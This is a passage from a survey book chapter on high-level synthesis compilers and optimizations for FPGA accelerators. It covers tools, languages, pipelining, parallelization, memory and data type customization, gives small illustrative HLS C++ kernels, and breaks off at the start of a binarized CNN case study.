C-Based HLS Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 993
Dataflow Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 994
Domain-Specific Languages (DSLs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 995
Emerging Accelerator Design Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 996
Key Compiler and Synthesis Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 997
Pipelining Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 998
Parallelization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1004
Memory Customization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1007
Data Type Customization Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1011
Case Study: Binarized Convolutional Neural Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013
Algorithm Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013
Pipelining and Unrolling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1014
Line Buffers and Window Buffers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1016
Data Vectorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1016
Equal contribution from the first two authors; part of their work was done at Cornell.
N. Srivastava
Google LLC, Mountain View, CA, USA
G. Liu
Xilinx, Inc., San Jose, CA, USA
e-mail: [email protected]
Y.-H. Lai · Z. Zhang ()
Cornell University, Ithaca, NY, USA
e-mail: [email protected]; [email protected]
Abstract
Keywords
Introduction
Over the past two decades, field-programmable gate arrays (FPGAs) have evolved
from small chips with a few thousand logic blocks to billion-transistor systems-on-
chip that offer an attractive option for flexible and efficient accelerated computing.
In contrast to general-purpose processors (CPUs) and graphics processing units
(GPUs), FPGAs can be reconfigured to implement a highly specialized accelerator
architecture that is specifically optimized based on the key characteristics of a target
application. More specifically, the compute pipeline, memory hierarchy, and the
numerical representation of an FPGA accelerator are all customizable (Choi et al.
2016). For many applications, having such architectural flexibility can overcome the
limitation of a slower clock on an FPGA device, leading to both higher performance
and improved energy efficiency.
However, software programmability is a major hurdle for the wide deployment of FPGA-based acceleration (Bacon et al. 2013). Traditionally, FPGAs are programmed using register-transfer level (RTL) languages, where the designer is responsible for describing the design at a low, cycle-accurate level of abstraction.

Existing HLS Compilers and Programming Models
In this section, the authors describe and categorize the existing HLS tools and
compilers targeting FPGAs. There is a broad spectrum of programming models and
compilers for FPGAs, such as C-based HLS, dataflow compilers, domain-specific
languages, and emerging accelerator design languages. Due to the space limitation,
the authors can only survey a (small) subset of the representative and more recent
efforts.
While modern HLS tools may differ significantly in their input specifications,
they usually follow a similar design flow, which the authors sketch in Fig. 1. Starting
from a software program, the designer manually partitions it into a software part
running on the host CPU, and a set of compute-intensive kernels that are offloaded
to the FPGA. Some of the hardware/software partitioning tasks can also be done
automatically (King and Dave 2012). The designer further provides the tool with
pragmas and directives to instruct the tool to generate the desired datapath and
memory components. As described in Chap. 24, “Accelerator Design with
High-Level Synthesis”, the HLS tool first compiles the source level program into an
intermediate representation (IR), typically using an off-the-shelf software compiler
front-end. The IR is then iteratively transformed and optimized using native and
FPGA-specific passes. After that, compute kernels and tasks are extracted by the
tool to expose the data-level and task-level parallelism. Each of the kernels and tasks
is optimized through scheduling, pipelining, and other optimizations to extract loop-
level and operator-level parallelism. In addition, customized memory hierarchies are
generated to provide sufficient memory bandwidth to the compute kernels. Finally,
an RTL design is generated and synthesized into an FPGA bitstream.
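To make the flow concrete, the following minimal sketch (not taken from the chapter) shows what such a user-directed kernel might look like in a C-based HLS tool. The pragma spellings follow the Xilinx Vivado/Vitis HLS convention; the kernel, bundle names, and problem size are hypothetical.

```cpp
// Hypothetical vector-add kernel for a C-based HLS tool. Pragma spellings
// follow the Xilinx Vivado/Vitis HLS convention; bundle names and the
// problem size are illustrative.
#define SIZE 1024

void vadd(const int a[SIZE], const int b[SIZE], int c[SIZE]) {
// Map the arrays to AXI master interfaces toward off-chip memory.
#pragma HLS INTERFACE m_axi port=a bundle=gmem0
#pragma HLS INTERFACE m_axi port=b bundle=gmem1
#pragma HLS INTERFACE m_axi port=c bundle=gmem0

  for (int i = 0; i < SIZE; ++i) {
// Directive: pipeline the loop with an initiation interval (II) of 1.
#pragma HLS PIPELINE II=1
    c[i] = a[i] + b[i];
  }
}
```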
Fig. 1 A typical HLS design flow: the software program is partitioned into a host program and compute kernels under user-provided pragmas/directives; the kernels are lowered to an intermediate representation and optimized, loop-level/operator-level parallelism is extracted and the memory hierarchy customized, and an FSM-plus-datapath RTL design is generated and synthesized into a bitstream, with QoR (area/timing/throughput) feedback

C-Based HLS Tools
The contemporary HLS compilers are commonly based on C/C++ and its extensions
(e.g., OpenCL, SystemC). These tools accept sequential C-like code as input with
optional user directives, and generate optimized hardware implementations on the
FPGA by exploiting various parallelization and customization opportunities either
automatically or guided by user directives. The representative C-based commercial
HLS tools include Xilinx Vivado/Vitis HLS, Xilinx Vitis Unified Software Platform,
Intel FPGA SDK for OpenCL, and Intel HLS Compiler. The HLS compilers based
on C/C++ have the advantage of allowing programmers to express algorithms
in an imperative way using the familiar C semantics, while leaving the work of
extracting parallelism and memory specialization to the compiler. Tools such as the
Xilinx OpenCL Compiler and Intel FPGA SDK for OpenCL can generate optimized
hardware implementations exploiting the parallelism explicitly expressed in the
OpenCL language. Such tools are especially suitable for applications with a high
degree of regular data-level parallelism. Mentor Catapult and Cadence Stratus HLS
tools mainly focus on ASIC designs, although they can also target a number of
popular FPGA devices. LegUp (Canis et al. 2011), Bambu (Pilato and Ferrandi
2013), ROCCC (Najjar et al. 2016), GAUT (Coussy et al. 2008), and Kiwi Compiler
(KiwiC) (Singh and Greaves 2008) are among the well-known open-source HLS
tools developed by academic groups.
One of the key challenges of C-based HLS tools is for a user to write “hardware-
friendly” code in a way that efficient parallel/pipelined architecture can be inferred
from a sequential program. A newer generation of tools try to automate this
process to ease the burden of the programmers. For example, the Merlin Compiler
(2020) from Falcon Computing (recently acquired by Xilinx) takes an OpenMP-style C programming model and automatically generates the HLS C/OpenCL
code with optimized off-chip data movement, on-chip data reuse and memory
partitioning, and parallel-pipelined loops. Silexica (also acquired by Xilinx) pro-
vides the SLX FPGA Tool Suite to help convert non-synthesizable C/C++ code
to synthesizable HLS C code for Xilinx Zynq SoC and MPSoC devices. Delft
Workbench (DWB) (Nane et al. 2014) is a toolchain that uses Quipu (Meeuws et al.
2011) and Quad (Ostadzadeh et al. 2010) to predict the hardware usage and memory
accesses of a high-level application written in C and maps the compute-intensive
functions onto FPGAs.
Dataflow Compilers

Domain-Specific Languages (DSLs)
DSLs provide more specialized language constructs and the associated compila-
tion flow that target a specific domain. This raises the level of abstraction for
the programmers and potentially simplifies the work of compilers in identifying
and exploiting opportunities for advanced domain-specific optimizations. Poly-
Mage (Mullapudi et al. 2015) includes a Python-embedded image processing
DSL and a polyhedral compilation framework composed of an optimizer and
an autotuner. It can automatically generate high-performance image processing
pipelines executed on the reconfigurable hardware. Halide (Ragan-Kelley et al.
2013) is a DSL specifically designed for high-performance image processing for
CPUs/GPUs. Halide-HLS (Pu et al. 2017), HeteroHalide (Li et al. 2020), and
GENESIS (Ishikawa et al. 2019) build on Halide to generate optimized image
processing pipelines for FPGAs. In addition to major works exploiting the Halide
compiler within their toolchain, there are a number of projects such as Liao et al.
(2019) and Carlson and Van Wyk (2019) that follow the same workflow but with
either extended versions of the Halide compiler or Halide-inspired DSL compilers
to support their own domain-specific structures. Darkroom (Hegarty et al. 2014) and
Rigel (Hegarty et al. 2016) can capture image processing algorithms as DAGs of
basic image processing operations and generate efficient hardware accelerators for
FPGA. Heterogeneous image processing acceleration (Hipacc) (Reiche et al. 2017)
is another DSL that is able to produce low-level code for image processing kernels
on FPGAs. The Rathlin image processing language (RIPL) (Stewart et al. 2018) is
a DSL for developing memory-efficient image processing applications.
OptiML (Sujeeth et al. 2011), a Scala-embedded machine learning DSL imple-
mented using the Delite compiler framework (Lee et al. 2011), is an automated
design tool for realizing FPGA accelerators from high-level programs. Tensor-
Flow (Abadi et al. 2016), MXNet (Chen et al. 2015), Caffe (Jia et al. 2014),
and PyTorch (Paszke et al. 2019) are some of the common DSLs designed
specifically for deep learning. Caffeine (Zhang et al. 2018a), based on Caffe, is
a hardware/software co-design framework to efficiently accelerate the entire CNN
on FPGAs. Spatial Multiverse (Hadjis and Olukotun 2019) converts a trained TensorFlow model to the Spatial (Koeplinger et al. 2018) hardware IR and generates FPGA accelerators from it.

Emerging Accelerator Design Languages
While DSLs offer many advantages in productivity and compilation for individual
application domains, more general-purpose language models are still needed to (1) bridge the gaps between popular domains, (2) provide programmers with greater control over important optimizations, and (3) serve as a compilation target for
multiple high-level DSLs. Hence there is an increasingly popular trend to raise
the level of abstraction for HLS designs, while still being able to target various
application domains. Emerging accelerator design languages are specialized to
abstract away the implementation-level details of a C-based HLS design, while
allowing the designer to focus on higher-level design and optimization decisions.
Spatial (Koeplinger et al. 2018) is a Scala-based language and compiler to define
hardware accelerators. It is built using the Delite hardware definition language
(DHDL) (Koeplinger et al. 2016). Hot & Spicy (Skalicky et al. 2018) is an open-
source framework and toolchain for exploiting FPGA accelerators in applications
developed completely in Python. HeteroCL (Lai et al. 2019) is composed of a
Python-based DSL and an automated compilation flow that maps the input algorithm
into special-purpose accelerators through HLS. Similar to Halide (Ragan-Kelley
et al. 2013) and TVM (Chen et al. 2018), HeteroCL separates an algorithm spec-
ification from a temporal compute schedule. It further decouples the algorithm from
memory architectures and data quantization schemes, which are both essential for
efficient hardware customization. With respect to memory customization, HeteroCL
provides primitives to create custom memory hierarchy through banking, reuse
buffers, and data streaming. Dahlia (Nigam et al. 2020) is a new HLS language
that uses a type system to restrict the design space to HLS programs that can be
predictably compiled to hardware accelerators.
Key Compiler and Synthesis Optimizations
While the existing HLS tools introduced in section “Existing HLS Compilers and
Programming Models” may differ significantly in their input specifications and
targeted application domains, they often employ a common set of optimizations
to achieve the design’s performance target. This section summarizes such key
optimizations that are ubiquitous in the existing tools and analyzes how each of
them affects the overall design throughput.
There are three major factors that impact the throughput of an HLS-based design,
which the authors summarize into the following formula:

$$\mathrm{Throughput} \propto \mathrm{Parallelism} \times \mathrm{Utilization} \times \mathrm{Clock\ Frequency} \qquad (1)$$

Fig. 2 Parallel-pipelined accelerator architecture template: an array of compute units connected through an on-chip network to the host and to HBM/DDR memory

Figure 2 sketches the corresponding architectural template. Each compute unit implements one of the many parallelizable tasks in the design. Such parallel compute units
help increase the hardware parallelism. Within each compute unit, there are
pipelined compute datapaths and the corresponding control logic. The pipeline can
be implemented as coarse-grained task-level pipelines and/or fine-grained loop-
level pipelines. These pipelines improve the utilization of the underlying hardware
resources. Finally, an application-specific memory hierarchy needs to be built
to supply the compute units with enough on-chip and off-chip bandwidth. This
includes data reuse to reduce off-chip memory accesses as well as on-chip buffering
and partitioning to increase on-chip memory bandwidth. Such a customized memory
hierarchy works with the parallelization and pipelining techniques to maximize the
throughput of the design.
Modern HLS tools commonly provide a set of compiler transformations and
synthesis optimizations to realize such an architectural template. In the following,
the authors use this parallel-pipelined architectural template with customized
memory hierarchy to drive the discussion of the rest of this chapter.
Pipelining Techniques
Operator-Level Optimizations
On general-purpose processors, the operations in the source program are compiled
into a fixed set of instructions, where each instruction takes at least one clock cycle.
In contrast, FPGA HLS tools can map the operations onto the heterogeneous resources in a more flexible way to improve the resource utilization and/or increase
the clock frequency. Depending on the complexity of the operations being mapped,
the HLS tool can either pipeline them to improve timing, or schedule multiple
dependent operations into a single cycle to reduce latency. Figure 3 illustrates two
important operator-level optimizations, which the authors discuss in more detail as
follows.
Operator chaining schedules multiple dependent operations into one clock
cycle as long as the estimated delay of the resulting combinational logic does not
exceed the target cycle time. The delay estimation usually also takes into account the
underlying LUT primitives on an FPGA, so that the operations that are efficiently
implementable on an FPGA (e.g., bitwise operations) can be aggressively chained
into a single cycle to improve the performance. Operation chaining improves the
utilization of the FPGA hardware resources by enabling the execution of multiple
operations on a small number of hardware resources. A recent technique considers
the underlying LUT mapping optimization during operator chaining to aggressively
group operations that can be combined into a single level of LUTs (Tan et al. 2015;
Zhao et al. 2015). The study in Ustun et al. (2020) recognizes that the additive delay model commonly used in HLS tools does not accurately reflect the
true operator-level delay. They propose to use learning-based approaches to predict
the operator delay based on features extracted from existing designs as the training
set.
Besides operation chaining, modern FPGAs commonly contain dedicated DSP
blocks that can implement various common datapath patterns through DSP map-
ping. For example, the Xilinx DSP58 block in the Versal ACAP device includes
a 27-bit pre-adder, a 27-by-24-bit multiplier, as well as a 58-bit ALU that can
implement different operations such as addition, accumulation, and various bit-level
operations (Versal ACAP 2020). In Fig. 3, the add-multiply-add pattern is mapped
to the DSP block to utilize the fast pre-adder, multiplier, and post-adder in the DSP
block. Effectively detecting such DSP patterns during HLS optimization is critical to
achieve high performance. Ronak and Fahmy (2015a) propose an automated three-
step approach to partition a dataflow graph into subgraphs that can be mapped to a
DSP.
It is also worth noting that the hard blocks such as block memories and DSP
units on an FPGA can operate at a higher frequency than the LUT-based soft
logic. This provides the HLS tool additional opportunities to improve the resource
utilization by clocking such hard blocks at a faster rate. Such techniques are called
multi-pumping (Canis et al. 2013). For example, when one clocks a DSP block
twice as fast as the system clock (i.e., double pumping), one can reuse the same
physical block to perform two multiplications in one system clock cycle. The multi-
pumping technique has been demonstrated for both the DSP blocks (Ronak and
Fahmy 2015b) and the on-chip RAM modules (LaForest and Steffan 2010), showing
nontrivial DSP and RAM resource reductions with a small overhead in LUT and
register usage.
ILP-based approaches (Hwang et al. 1991) are among the early techniques
where various scheduling constraints can be expressed as an integer linear program.
A system-of-difference-constraints (SDC) formulation is used in loop pipelining (Zhang and Liu 2013) to improve the scalability of the ILP-based pipelining formulation by
realizing that most of the pipelining constraints are in the form of pairwise difference
constraints. The underlying constraint matrix of an SDC system has a special
property which guarantees that an integer-valued solution can be efficiently obtained
through solving a linear program (Zhang and Liu 2013). Ordering heuristics are
proposed to handle constraints that cannot be expressed as linear differences such
as the resource constraints. Recently, the authors of Dai et al. (2018) and Dai and
Zhang (2019) further extend the SDC-based scheduling formulation by encoding
the resource constraints part as a Boolean satisfiability (SAT) problem. The joint
SAT-SDC problem is solved iteratively through efficient conflict-driven learning to
find the exact solution while achieving a significant speedup over the ILP-based
alternatives.
Data hazards in the form of memory dependences limit the achievable II of
an HLS pipeline. In Fig. 4, there is a read-after-write (RAW) dependence between
two consecutive iterations. Thus, the best achievable II without violating the RAW
dependence is 3. However, in many scenarios, the memory dependences only occur infrequently at run time, which has motivated dynamic hazard resolution techniques (Dai et al. 2017).
Fig. 4 Statically scheduled pipelining with the RAW data dependence and the loop rewind
optimization
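The code behind Fig. 4 is not reproduced in the text; as a hypothetical sketch of the situation it depicts, consider the following histogram loop, a common shape for loop-carried RAW dependences: each iteration may read a bin written by a recent earlier iteration, so a statically scheduled pipeline must conservatively space iterations apart.

```cpp
// Hypothetical loop with a loop-carried RAW dependence through hist[]:
// each iteration reads, increments, and writes back one histogram bin.
// If the read-modify-write chain takes three cycles, a static scheduler
// that must assume idx can repeat ends up with II = 3.
void histogram(const unsigned char in[1024], int hist[256]) {
  for (int i = 0; i < 1024; ++i) {
#pragma HLS PIPELINE II=1   // the tool will relax this to II = 3 here
    unsigned char idx = in[i];
    hist[idx] = hist[idx] + 1;   // RAW dependence across iterations
  }
}
```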
Fig. 5 Task-level pipelining of a simple dataflow network with processes A (load), B (compute), and C (store): the processes overlap within the same invocation, and successive invocations of the network can also overlap in time
Parallelization Techniques
As stated in Equation (1), increasing the parallelism in the design is vital to improve
the throughput of an FPGA accelerator. Depending on the design characteristics,
an HLS design can often be parallelized by exploiting either data- or task-
level parallelism. As illustrated in Fig. 6, vectorization can also be applied at the
operator level to data-parallel applications to widen the datapath. Parallel loops
can be unrolled to execute multiple iterations concurrently. In addition, multiple
independent tasks can be processed in parallel to exploit task-level parallelism.
Figure 6 illustrates the difference between data-level and task-level parallelism. For
data-level parallelism, the set of operations performed on different data elements
are typically homogeneous. On the other hand, for task-level parallelism, each task
can be heterogeneous. In other words, each task executes different jobs in parallel.
In the following sections, the authors explain in more detail how the FPGA-specific
compilers exploit these different forms of parallelism.
Fig. 6 Data-level parallelism versus task-level parallelism: with data-level parallelism, homogeneous task instances operate on different data elements in parallel; with task-level parallelism, heterogeneous tasks execute in parallel
In task-parallel designs, streams or channels are used to satisfy the data dependencies between tasks.
concept of streaming objects to represent tasks and uses Vivado HLS streams
and Intel FPGA SDK for OpenCL channel interfaces to connect tasks with data
dependencies. T2S-Tensor (Srivastava et al. 2019) uses isolate directives to split a
task into multiple smaller sub-tasks that are connected via channels and are executed
in parallel. TAPA (Chi et al. 2020) is an HLS C++ language extension that enhances
the productivity of programming task-parallel applications on FPGAs.
Memory Customization Techniques

Accesses to off-chip memory have higher latency and lower bandwidth compared to accesses to on-chip memory. The high latency of memory
accesses can result in the compute pipeline being stalled for a significant period
of time, leading to low performance and poor resource utilization. The low off-chip
memory bandwidth can result in low parallelism since the compute resources cannot
be scaled until there is sufficient bandwidth to supply the data. Thus, achieving
low-latency and high-bandwidth memory accesses is essential to achieve high
parallelism and high compute utilization, which are the key factors for performance
in Equation (1). In this section, the authors first discuss the data reuse buffers and
decoupled access-execute architectures that improve the utilization of the compute
resources by reducing the memory access latency. The authors then talk about two
common approaches for increasing the memory bandwidth: (a) data vectorization
and (b) memory banking.
In commercial HLS tools such as Xilinx Vivado HLS and Intel FPGA SDK for OpenCL, loop splitting
and data tiling need to be performed manually at the source level. Many DSLs
such as Halide-HLS (Pu et al. 2017), T2S-Tensor (Srivastava et al. 2019), and
HeteroCL (Lai et al. 2019) allow the user to specify loop splitting and data
tiling using loop transformation primitives that are decoupled from the algorithmic
specification. Apart from user-specified data tiling, there have been multiple efforts
to automatically tile the application data using the polyhedral framework. Chugh
et al. (2016) built a DSL on top of PolyMage that tries to maximally exploit the
data reuse under the constraints of available on-chip memory capacity and off-chip
memory bandwidth. Pouchet et al. (2013) presented an end-to-end system using the
polyhedral model which automatically transforms the program for effective data
reuse, including the handling of on-chip buffers for FPGAs.
Depending on the memory access patterns, data reuse buffers can be imple-
mented in various forms such as random access buffers, FIFOs, cyclic shift-registers,
window buffers, and line buffers. Random access buffers allow data to be read and
written at any position. However, these types of buffers do not scale well since the
access time for a buffer increases with its size. Memory banking, as is discussed in
the next subsection, is a common way to split these large buffers into multiple small
buffers. FIFOs are used to provide asynchronous data transfer from producer to
consumer in designs that exhibit task-level pipelining. Cyclic shift registers are used
for cyclic accesses to a fixed amount of data. Line buffers and window buffers are
specific types of buffer implementations that are primarily used in image-processing
kernels with sliding window access patterns. The authors show an example of using
a pair of line buffer and window buffer in Fig. 7, where one computes a two-
dimensional convolution with filter size 3 × 3. The main purpose of such reuse
buffers is to reduce the memory accesses by caching reusable data. For instance,
suppose one unrolls loops r and c; one then needs to access the input array in nine times per iteration before applying reuse buffers (Fig. 7a, Line 6). After applying reuse buffers, only one access per iteration is needed (Fig. 7b, Line 12). More details are discussed in the case
study (section “Case Study: Binarized Convolutional Neural Networks”).
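Since the code of Fig. 7 is not reproduced in the text, the following sketch illustrates the same idea under our own assumptions (image width W, 3 × 3 filter, HLS-style C++ with a Xilinx-style pipeline pragma): two line buffers cache the two most recent rows, and a 3 × 3 window buffer supplies all nine operands from a single new pixel read per iteration.

```cpp
#define W 64   // image width/height (assumed square)

// 3x3 convolution with a line buffer (two most recent rows) and a 3x3
// window buffer; each iteration reads exactly one new pixel from memory.
void conv3x3(const unsigned char in[W * W], int out[W * W],
             const char f[3][3]) {
  unsigned char line_buf[2][W];   // rows y-2 and y-1
  unsigned char window[3][3];     // sliding 3x3 window

  for (int y = 0; y < W; ++y)
    for (int x = 0; x < W; ++x) {
#pragma HLS PIPELINE II=1
      unsigned char px = in[y * W + x];   // the single memory access
      // Shift the window left; refill the right column from the line
      // buffers (rows y-2, y-1) and the newly read pixel (row y).
      for (int r = 0; r < 3; ++r)
        for (int c = 0; c < 2; ++c)
          window[r][c] = window[r][c + 1];
      window[0][2] = line_buf[0][x];
      window[1][2] = line_buf[1][x];
      window[2][2] = px;
      // Rotate the line buffers so they hold rows y-1 and y afterward.
      line_buf[0][x] = line_buf[1][x];
      line_buf[1][x] = px;
      // Emit an output once the window holds valid data (y, x >= 2).
      if (y >= 2 && x >= 2) {
        int acc = 0;
        for (int r = 0; r < 3; ++r)
          for (int c = 0; c < 3; ++c)
            acc += window[r][c] * f[r][c];
        out[(y - 2) * W + (x - 2)] = acc;   // valid-region output
      }
    }
}
```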
There are different ways of specifying reuse buffers in modern HLS compilers.
Xilinx Vivado HLS and Intel FPGA SDK for OpenCL allow the user to implement
buffers using the arrays in C/C++/OpenCL. T2S-Tensor (Srivastava et al. 2019)
and SuSy (Lai et al. 2020) allow users to insert buffers into a tensor computation
using the loop removal and buffer insertion directives. PolyMage (Mullapudi et al.
2015) automatically inserts buffers in the generated code for the output of each
intermediate function computation in the compute pipeline. HeteroCL (Lai et al.
2019) uses the reuse_at directive to create a reuse buffer. Halide-HLS (Pu et al.
2017), Darkroom (Hegarty et al. 2014), and Hipacc (Reiche et al. 2017) implement
mechanisms to specify the line buffer insertion in image processing pipelines.
Decoupled Access-Execute
The concept of decoupled access-execute (DAE) architecture was first introduced by James Smith (1982) in the context of CPUs to hide the memory access latency. Most of the FPGA accelerators today make use of the DAE scheme.

Fig. 7 Example of exploiting data reuse with a pair of window and line buffers. (a) HLS code for 2D convolution. (b) HLS code after introducing reuse buffers. (c) Mechanism of the line buffer and window buffer

Instead of having the compute pipeline directly request data from memory, separate data access
(read or write) pipelines are instantiated to handle the data movement between the
main memory and the accelerator. Since the data access pipeline writes data to on-
chip buffers and a compute pipeline reads data from these buffers, it can introduce
new stalls in the pipeline. This inefficiency can be solved with double buffers (also
known as ping-pong buffers). A double buffer consists of two buffers, one for read,
called read buffer, and another one for write, called write buffer. The compute
pipeline processes the data tile in the read buffer while at the same time the memory
load/store pipeline replaces the data from an old tile with the new tile in the write
buffer. When the computation on the read buffer is complete and the write buffer is
filled with data, the two buffers are swapped (namely, read becomes write and write
becomes read). Double buffering has 2× area overhead as it requires 2× on-chip
storage. However, the area overhead is often outweighed by the pipeline efficiency
achieved in terms of fewer stalls and higher throughput. The double buffer technique is a form of latency hiding, where one hides the memory latency of loads/stores by overlapping the compute and memory pipelines and thus improves
the utilization in Equation (1). Chapter 24, “Accelerator Design with High-Level
Synthesis” also provided some other memory latency hiding techniques such as
hardware-managed caches and prefetchers.
C-based HLS compilers such as Vivado HLS, Intel FPGA SDK for OpenCL, and
LegUp (Canis et al. 2011) allow specifying double buffers as memory arrays and a
boolean variable that determines the read and write buffers. T2S-Tensor (Srivastava
et al. 2019) allows the user to specify double buffer as a spatial optimization.
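The following is a minimal sketch of the ping-pong scheme described above, with hypothetical helper functions and tile size (not code from the chapter): the load stage fills one buffer while the compute stage consumes the other, and the roles swap every tile. In sequential C the two calls execute one after the other; an HLS tool can overlap them because they touch disjoint buffers.

```cpp
#define TILE 256

// Placeholder stages; in a real design these are the memory-access and
// compute pipelines.
static void load_tile(const int *src, int dst[TILE]) {
  for (int i = 0; i < TILE; ++i) dst[i] = src[i];
}
static void compute_tile(const int src[TILE], int *out) {
  for (int i = 0; i < TILE; ++i) out[i] = src[i] * 2;  // dummy compute
}

// Ping-pong control: while compute_tile() consumes one buffer, the next
// tile is loaded into the other buffer.
void process(const int *in, int *out, int num_tiles) {
  int buf0[TILE], buf1[TILE];
  load_tile(in, buf0);                      // prologue: fill first buffer
  for (int t = 0; t < num_tiles; ++t) {
    int *rd = (t % 2 == 0) ? buf0 : buf1;   // buffer being computed on
    int *wr = (t % 2 == 0) ? buf1 : buf0;   // buffer being refilled
    if (t + 1 < num_tiles)
      load_tile(in + (t + 1) * TILE, wr);   // overlaps with compute in HLS
    compute_tile(rd, out + t * TILE);
  }
}
```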
Data Vectorization
Data vectorization helps achieve high off-chip memory bandwidth utilization, which
is essential for memory-bound applications where the compute resources cannot
be scaled until there is enough memory bandwidth to feed the parallel compute
units. With data vectorization, instead of reading/writing a single element, one reads
and writes a vector of elements, such as sixteen 32-bit floating point numbers, in
the same step. Let us consider the example of a simple DDR model with a bus
width of 64 bits and burst length of 8. Whenever a DRAM access is completed
and an entire DRAM line is fetched from the memory array, the contiguous data
can be sent out to the memory in chunks of 64 bits for up to 8 consecutive
cycles. This means that accessing a 16-element vector of 32-bit floating point values
achieves higher bandwidth than individually accessing these 16 elements. Thus, data
vectorization helps achieve higher compute parallelism which directly results in a
higher throughput as in Equation (1).
T2S-Tensor (Srivastava et al. 2019) and Halide-HLS (Pu et al. 2017) allow the
user to specify data vectorization using vectorization directives. Intel FPGA SDK for OpenCL provides vector data types for integers and floating-point numbers that
can be used to perform vectorized memory accesses. Depending on the memory access pattern, it compiles a global memory access into either a burst-coalesced load-store unit (LSU) that buffers requests until the largest possible burst can be made, a prefetching LSU that prefetches the data assuming contiguous reads, or a cached burst-coalesced LSU, which is a burst-coalesced LSU with an on-chip cache. Vivado HLS also allows the user to pack multiple data elements in a C struct to allow for
wide memory accesses. It allows burst-mode data transfer using either a memcpy
function in C or a pipelined for loop that accesses memory in a sequential order and
where the memory accesses are not placed inside conditional statements.
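A minimal sketch of the struct-packing style mentioned above (names and widths are ours, not from the chapter): sixteen 32-bit words are grouped into one 512-bit element so that each pipelined access moves a full bus-width transaction.

```cpp
// A 512-bit packed element: one access moves sixteen 32-bit words,
// matching the full width of a wide memory bus.
struct vec16 {
  int data[16];
};

void copy_vectorized(const vec16 *src, vec16 *dst, int n_vecs) {
  for (int i = 0; i < n_vecs; ++i) {
#pragma HLS PIPELINE II=1
    dst[i] = src[i];   // one wide transaction instead of 16 narrow ones
  }
}
```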
Memory Banking
An FPGA-based accelerator is typically highly parallelized and/or deeply pipelined
in order to achieve a desirable throughput as shown in Fig. 2. As a result, multiple
parallel accesses to a single on-chip memory are often required to provide the
necessary data bandwidth to sustain the high throughput of the accelerator. However,
the embedded memory blocks available on modern FPGA devices (e.g., BRAMs)
only provide a very limited number of ports for concurrent reads/writes. Simply
replicating the BRAMs to create multi-ported memories is not scalable or even
feasible due to the steep area overhead and potential memory coherence overhead
resulting from write operations. A more viable solution is memory banking,
which partitions a memory block into several smaller banks so that concurrent accesses that fall into different banks can be served in parallel.
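A minimal banking sketch, assuming a Xilinx-style ARRAY_PARTITION pragma (the function and sizes are hypothetical): cyclic partitioning with a factor of 4 places elements i, i+1, i+2, and i+3 in four different banks, so the four reads issued per pipelined iteration do not contend for BRAM ports.

```cpp
// Cyclic partitioning with factor 4 creates four banks; elements
// i, i+1, i+2, i+3 land in different banks, so the four reads per
// iteration of the pipelined loop can be served concurrently.
void sum4(const int in[1024], long long *result) {
  int buf[1024];
#pragma HLS ARRAY_PARTITION variable=buf cyclic factor=4

  for (int i = 0; i < 1024; ++i)   // fill the on-chip buffer
    buf[i] = in[i];

  long long acc = 0;
  for (int i = 0; i < 1024; i += 4) {
#pragma HLS PIPELINE II=1
    acc += buf[i] + buf[i + 1] + buf[i + 2] + buf[i + 3];
  }
  *result = acc;
}
```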
Data Type Customization Techniques

Unlike most other general-purpose architectures (there are configurable and extensible processor technologies, such as Cadence Tensilica Xtensa (Gonzalez 2000) and Synopsys ASIP Designer, that allow application-specific datapath bitwidth customization), an FPGA has the ability to implement a custom datapath consisting of
arithmetic and memory units that are not uniformly sized to a fixed bitwidth. This
allows programmers to exploit different numerical data types with the precision
tailored for a given application. Such flexibility can substantially improve the
efficiency for both compute engines and the custom memory hierarchy. For example,
multiple low-bitwidth data elements can be packed together into a wide bit vector
without increasing the footprint on the main memory. The packed data can then be
read/written in a single memory transaction, which greatly improves the bandwidth
utilization and the overall operational intensity of the accelerator. In addition,
operations with reduced bitwidth require fewer resources, and thus more compute
units can potentially be allocated on the same FPGA device to increase hardware
parallelism.
Selecting minimal bitwidths automatically typically relies on value range analysis. The common approach is to iteratively propagate the bitwidth
information on the underlying dataflow graph using both forward and backward
propagations until a fixed point is reached or the gain is diminishing (Stephenson
et al. 2000).
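The following sketch shows how such non-uniform bitwidths are typically expressed, assuming the Xilinx HLS arbitrary-precision headers (ap_int.h/ap_fixed.h) are available; the specific widths are illustrative choices of ours, not values from the chapter.

```cpp
#include <ap_fixed.h>
#include <ap_int.h>

// A 9-bit sum of two 8-bit pixels: the result width matches the value
// range exactly, so no register or LUT bits are wasted.
ap_uint<9> add_pixels(ap_uint<8> a, ap_uint<8> b) {
  return ap_uint<9>(a) + ap_uint<9>(b);
}

// A fixed-point MAC with 12 total bits and 4 integer bits, which is far
// cheaper on an FPGA than a single-precision floating-point MAC.
typedef ap_fixed<12, 4> q12_4;
q12_4 mac(q12_4 acc, q12_4 x, q12_4 weight) {
  return acc + x * weight;
}
```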
Case Study: Binarized Convolutional Neural Networks

Algorithm Overview
In a BNN (and CNN in general), a conv layer takes in M input feature maps of size I × I pixels, convolves them with filters of size K × K pixels, and produces N output feature maps of size S × S pixels. The corresponding compute can be expressed as the following equation:

$$\mathrm{out}_n(x, y) = \sum_{m=0}^{M-1} \sum_{r=0}^{K-1} \sum_{c=0}^{K-1} \mathrm{in}_m(x+c,\, y+r) \times w_{m,n}(c, r),$$

